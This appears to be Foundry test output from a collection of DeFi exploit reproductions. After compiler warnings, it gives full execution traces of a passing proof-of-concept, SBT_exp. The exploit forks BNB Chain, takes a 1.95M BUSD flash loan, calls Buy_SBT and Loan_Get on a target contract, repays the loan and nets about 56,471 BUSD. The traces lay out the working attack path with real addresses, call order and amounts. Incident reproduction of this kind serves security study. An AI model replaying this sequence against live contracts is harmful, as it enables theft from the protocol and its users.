Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/SBT_exp.sol:27:5:
   |
27 |     Uni_Pair_V3 Pool = Uni_Pair_V3(0x36696169C63e42cd08ce11f5deeBbCeBae652050);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2487:1:
     |
2487 | interface Pool {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/SBT_exp.sol:40:51:
   |
40 |     function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                                                   ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/SBT_exp.sol:40:65:
   |
40 |     function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                                                                 ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.30s (1.98ms CPU time)

Ran 1 test for src/test/2024-07/SBT_exp.sol:ContractTest
[PASS] testExploit() (gas: 399036)
Logs:
  Attacker BUSD balance before attack: 1.000000000000000000
  Attacker BUSD balance after attack: 56471.209679886340000000

Traces:
  [272455] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 40378159 [4.037e7])
    │   └─ ← [Return] 0
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(0x55d398326f99059fF775485246999027B3197955)
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x55d398326f99059fF775485246999027B3197955, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    └─ ← [Stop]

  [401836] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    ├─ emit log_named_decimal_uint(key: "Attacker BUSD balance before attack", val: 1000000000000000000 [1e18], decimals: 18)
    ├─ [380737] 0x36696169C63e42cd08ce11f5deeBbCeBae652050::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1950000000000000000000000 [1.95e24], 0, 0x3078313233)
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 36133491513892207520461026 [3.613e25]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 24757939605718713724968 [2.475e22]
    │   ├─ [8871] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1950000000000000000000000 [1.95e24])
    │   │   ├─ emit Transfer(from: 0x36696169C63e42cd08ce11f5deeBbCeBae652050, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1950000000000000000000000 [1.95e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x0000000000000000000000000000000000000000001de3907ffc3a06cc0530e2 → 0x0000000000000000000000000000000000000000001c46a2c9c290d1054530e2
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0x000000000000000000000000000000000000000000019cedc41a5fe96e240000
    │   │   └─ ← [Return] true
    │   ├─ [335967] ContractTest::pancakeV3FlashCallback(975000000000000000000 [9.75e20], 0, 0x3078313233)
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x2b45DD1d909c01aAd96fa6b67108D691B432f351, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa7d82f7d9e1f64e0d6c854e0ef727d8073c18cb338489bff81bbfbb58126eb5f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x2b45DD1d909c01aAd96fa6b67108D691B432f351, 950000000000000000000000 [9.5e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 950000000000000000000000 [9.5e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000019cedc41a5fe96e240000 → 0x00000000000000000000000000000000000000000000d3c229af83a148640000
    │   │   │   │   @ 0x87c17ff7bc843b6009e27da1c090f17e711ae6ed4f6be458b92ea9392953eadc: 0x000000000000000000000000000000000000000000000c2aa6970027a545aaab → 0x00000000000000000000000000000000000000000000d5564101dc6fcb05aaab
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24620] 0x94441698165fB7e132e207800B3eA57E34c93a72::approve(0x2b45DD1d909c01aAd96fa6b67108D691B432f351, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xffefcb1d7c60fe18b3a58fd2471a2e9b15904f44054efce245d989efd682f5fd: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [28498] 0x2b45DD1d909c01aAd96fa6b67108D691B432f351::_Start()
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2b45DD1d909c01aAd96fa6b67108D691B432f351) [staticcall]
    │   │   │   │   └─ ← [Return] 1007455165109033599609515 [1.007e24]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0 → 0x00000000000000000000000000000000000000000000000000000000668fc0ea
    │   │   │   │   @ 0: 0x0000000000000000000055d398326f99059ff775485246999027b31979550000 → 0x0000000000000000000055d398326f99059ff775485246999027b31979550001
    │   │   │   └─ ← [Stop]
    │   │   ├─ [66767] 0x2b45DD1d909c01aAd96fa6b67108D691B432f351::Buy_SBT(20000000 [2e7])
    │   │   │   ├─ [2607] 0x94441698165fB7e132e207800B3eA57E34c93a72::balanceOf(0x2b45DD1d909c01aAd96fa6b67108D691B432f351) [staticcall]
    │   │   │   │   └─ ← [Return] 20999916430830343150012642 [2.099e25]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2b45DD1d909c01aAd96fa6b67108D691B432f351) [staticcall]
    │   │   │   │   └─ ← [Return] 1007455165109033599609515 [1.007e24]
    │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, 959484790320113660000000 [9.594e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 959484790320113660000000 [9.594e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 115792089237316195423570985008687907853269984665640563079972793687799469639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa7d82f7d9e1f64e0d6c854e0ef727d8073c18cb338489bff81bbfbb58126eb5f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff34d239acd425cc0308ff
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000d3c229af83a148640000 → 0x000000000000000000000000000000000000000000000894635c57c714670900
    │   │   │   │   │   @ 0x87c17ff7bc843b6009e27da1c090f17e711ae6ed4f6be458b92ea9392953eadc: 0x00000000000000000000000000000000000000000000d5564101dc6fcb05aaab → 0x00000000000000000000000000000000000000000001a08407550849ff02a1ab
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [27937] 0x94441698165fB7e132e207800B3eA57E34c93a72::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 20000000000000000000000000 [2e25])
    │   │   │   │   ├─ emit Transfer(from: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 20000000000000000000000000 [2e25])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x80e24935e0b7a44eb071f236ef12dd8f0eda2b64eaab9e861ff84745818197c2: 0x000000000000000000000000000000000000000000115ee7c0357a75621a88e2 → 0x00000000000000000000000000000000000000000000d3bd940d77e4ce1a88e2
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000108b2a2c28029094000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa7d82f7d9e1f64e0d6c854e0ef727d8073c18cb338489bff81bbfbb58126eb5f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff34d239acd425cc0308ff
    │   │   │   │   @ 5: 0 → 0x000000000000000000000000000000000000000000002a5a058fc295ed000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [163628] 0x2b45DD1d909c01aAd96fa6b67108D691B432f351::Loan_Get(1966930 [1.966e6])
    │   │   │   ├─ [607] 0x94441698165fB7e132e207800B3eA57E34c93a72::balanceOf(0x2b45DD1d909c01aAd96fa6b67108D691B432f351) [staticcall]
    │   │   │   │   └─ ← [Return] 999916430830343150012642 [9.999e23]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2b45DD1d909c01aAd96fa6b67108D691B432f351) [staticcall]
    │   │   │   │   └─ ← [Return] 1966939955429147259609515 [1.966e24]
    │   │   │   ├─ [607] 0x94441698165fB7e132e207800B3eA57E34c93a72::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 20000000000000000000000000 [2e25]
    │   │   │   ├─ [5850] 0x94441698165fB7e132e207800B3eA57E34c93a72::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, 1299884000000000000000000 [1.299e24])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 1299884000000000000000000 [1.299e24])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, value: 115792089237316195423570985008687907853269984665640562739573584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xffefcb1d7c60fe18b3a58fd2471a2e9b15904f44054efce245d989efd682f5fd: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffeecbd25ac589954cfffff
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000108b2a2c28029094000000 → 0x0000000000000000000000000000000000000000000f77e751d45b29e8d00000
    │   │   │   │   │   @ 0x80e24935e0b7a44eb071f236ef12dd8f0eda2b64eaab9e861ff84745818197c2: 0x00000000000000000000000000000000000000000000d3bd940d77e4ce1a88e2 → 0x00000000000000000000000000000000000000000001e7006e611f4b794a88e2
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1966930000000000000000000 [1.966e24])
    │   │   │   │   ├─ emit Transfer(from: 0x2b45DD1d909c01aAd96fa6b67108D691B432f351, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1966930000000000000000000 [1.966e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x87c17ff7bc843b6009e27da1c090f17e711ae6ed4f6be458b92ea9392953eadc: 0x00000000000000000000000000000000000000000001a08407550849ff02a1ab → 0x0000000000000000000000000000000000000000000000008a28ca1034faa1ab
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000894635c57c714670900 → 0x00000000000000000000000000000000000000000001a917e0889600de6f0900
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 6: 0 → 64994
    │   │   │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 0 → 1
    │   │   │   │   @ 17: 0x0000000000000000000000000000000000000000000000030000000000000000 → 0x0000000000000000000000000000000000000000000000030000000000000001
    │   │   │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec2: 0 → 0x00000000000000000000000000000000000000000000000000000000001e0352
    │   │   │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec3: 0 → 0x000000000000000000000000000000000000000000000000000000000013d5ac
    │   │   │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec4: 0 → 0x00000000000000000000000000000000000000000000000000000000677d0eea
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000894635c57c714670900 → 0x00000000000000000000000000000000000000000001a917e0889600de6f0900
    │   │   │   │   @ 5: 0x000000000000000000000000000000000000000000002a5a058fc295ed000000 → 0x000000000000000000000000000000000000000000002d1ab0b46fc797ac0000
    │   │   │   │   @ 15: 0 → 0x00000000000000000000000000000000000000000000000000000000001e0352
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x36696169C63e42cd08ce11f5deeBbCeBae652050, 1950975000000000000000000 [1.95e24])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x36696169C63e42cd08ce11f5deeBbCeBae652050, value: 1950975000000000000000000 [1.95e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000001a917e0889600de6f0900 → 0x000000000000000000000000000000000000000000000bf54f77169091d30900
    │   │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x0000000000000000000000000000000000000000001c46a2c9c290d1054530e2 → 0x0000000000000000000000000000000000000000001de3c55ad4104151e130e2
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xffefcb1d7c60fe18b3a58fd2471a2e9b15904f44054efce245d989efd682f5fd: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 8: 0 → 0x00000000000000000000000000000000000000000000000000000000668fc0ea
    │   │   │   @ 0: 0x0000000000000000000055d398326f99059ff775485246999027b31979550101 → 0x0000000000000000000055d398326f99059ff775485246999027b31979550001
    │   │   │   @ 0xa7d82f7d9e1f64e0d6c854e0ef727d8073c18cb338489bff81bbfbb58126eb5f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 5: 0 → 0x000000000000000000000000000000000000000000002a5a058fc295ed000000
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 36134466513892207520461026 [3.613e25]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 24757939605718713724968 [2.475e22]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1950000000000000000000000 [1.95e24], param3: 0, param4: 975000000000000000000 [9.75e20], param5: 0)
    │   ├─  storage changes:
    │   │   @ 4: 0x000000000000000050cba0dcdd4e776a00000000000000b8c77665b23a59f8c3 → 0x000000000000000050cba0dcdd4e776a00000000000000cabff2fb557c57f8c3
    │   │   @ 2: 0x0000000000000000000000000000000075ed18e756865d70859bc578a8ed6da6 → 0x0000000000000000000000000000000075f5ee28b58c0d4adb7f3d2f66cc4c90
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 56471209679886340000000 [5.647e22]
    ├─ emit log_named_decimal_uint(key: "Attacker BUSD balance after attack", val: 56471209679886340000000 [5.647e22], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x000000000000000000000000000000000000000000000000000000000d480d48 → 0x000000000000000000000000000000000000000000000000000000010d480d48
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.39s (6.50s CPU time)

Ran 2 test suites in 8.40s (9.69s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
